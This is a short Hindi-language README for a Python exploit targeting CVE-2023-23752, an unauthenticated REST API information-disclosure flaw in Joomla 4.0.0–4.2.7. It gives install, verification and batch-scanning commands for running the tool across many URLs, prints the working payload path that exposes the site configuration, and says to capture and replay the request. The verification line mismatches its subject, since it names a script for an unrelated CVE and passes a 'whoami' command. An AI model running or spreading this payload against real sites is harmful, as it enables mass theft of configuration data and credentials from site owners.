
Python-आधारित एक्सप्लॉइट CVE-2023-23752 के लिए, जो Joomla 4.0.0-4.2.7 में अनधिकृत REST API एक्सेस को लक्षित करता है, जिससे तैयार किए गए पेलोड के माध्यम से संवेदनशील जानकारी का खुलासा संभव होता है।
CVE-2023-23752 - जूमला अनधिकृत पहुंच भेद्यता की पुनरावृत्ति
पायथन लाइब्रेरी स्थापित करें
pip install -r requirements.txt
भेद्यता सत्यापन
python3 CVE-2022-26134_check.py -u url -c whoami

बैच स्कैनिंग
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
भेद्यता पते तक पहुंचें, पैकेट कैप्चर करें, डेटा पैकेट को पुनः भेजें

Joomla! CMS संस्करण 4.0.0 - 4.2.7 में वेब सेवा एंडपॉइंट्स पर अनुचित एक्सेस प्रतिबंधों के कारण, Rest API तक अनधिकृत पहुंच हो सकती है, जिससे संवेदनशील जानकारी लीक हो सकती है।